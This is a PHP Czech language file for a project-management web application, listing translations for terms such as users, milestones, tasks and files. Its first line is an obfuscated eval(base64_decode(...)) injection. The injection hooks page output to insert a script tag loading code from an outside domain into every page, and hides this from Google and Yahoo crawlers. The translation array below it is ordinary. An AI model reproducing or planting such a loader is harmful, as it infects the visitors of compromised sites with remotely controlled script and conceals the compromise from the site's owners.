<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  return array(
  
    // Objects
    'user' => 'Uživatel',
    'group' => 'Skupina',
    'groups' => 'Skupiny',
    'users' => 'Uživatelé',
    'member' => 'Člen',
    'members' => 'Členové',
    'company' => 'Společnost',
    'companies' => 'Společnosti',
    'client' => 'Klient',
    'clients' => 'Klienti',
    'package' => 'Balíček',
    'project' => 'Pracovní plocha',
    'projects' => 'Pracovní plochy',
    'message' => 'Poznámka',
    'messages' => 'POznámky',
    'comment' => 'Komentář',
    'comments' => 'Komentáře',
    'milestone' => 'Milník',
    'milestones' => 'Milníky',
    'task' => 'Úkol',
    'subtasks' => 'Podúkol',
    'tasks' => 'Úkoly',
    'task list' => 'Úkol',
    'task lists' => 'Úkoly',
    'tag' => 'Štítek',
    'tags' => 'Štítky',
    'attachment' => 'Přípona',
    'attachments' => 'Přípony',
    'object subscribers' => 'Odběratelé',
    'form' => 'Formulář',
    'forms' => 'Formuláře',
    'file' => 'Soubor',
    'files' => 'Soubory',
    'file revision' => 'Revize souboru',
    'file revisions' => 'Revize souborů',
    'revision' => 'Revize',
    'revisions' => 'Revize',
    'folder' => 'Adresář',
    'folders' => 'Adresáře',
    'configuration category' => 'Nastavení kategorie',
    'configuration categories' => 'Nastavení kategorií',
    'handin' => 'Blízko..',
    'handins' => 'Blízko..',
    
    // Variations
    'owner company' => 'Majitel společnosti',
  	'client companies' => 'Klientské společnosti',
    
    'open milestone' => 'Otevřít milník',
    'open milestones' => 'Otevřít milníky',
    'completed milestone' => 'Dokončený milník',
    'completed milestones' => 'Dokončené milníky',
    'late milestones' => 'Zpožděné milníky',
    'late milestones and tasks' => 'Opožděné milníky a úkoly',
    'today milestones' => 'Dnešní milníky',
    'upcoming milestones' => 'Nastávající milníky',
    'completed task list' => 'Dokončený úkol',
    'completed task lists' => 'Dokončené úkoly',
    'open task list' => 'Otevřít úkol',
    'open task lists' => 'Otevřít úkoly',
    'active project' => 'Aktivní projekt',
    'active projects' => 'Aktivní projekty',
    'finished project' => 'Ukončený projekt',
    'finished projects' => 'Ukončené projekty',
    'linked object' => 'Související objekt',
    'linked objects' => 'Související objekty',
    
    'important message'  => 'Důležitá poznámka',
    'important messages' => 'Důležité poznámky',
    'important file'     => 'Důležitý soubor',
    'important files'    => 'Důležité soubory',
    'parent task'    => 'Rodičovská úloha',
    
    'private message' => 'Soukromá poznámka',
    'private milestone' => 'Soukromý milník',
    'private task list' => 'Soukromý úkol',
    'private comment' => 'Soukromý komentář',
    'private file' => 'Soukromý soubor',
    
  ); // array

?>
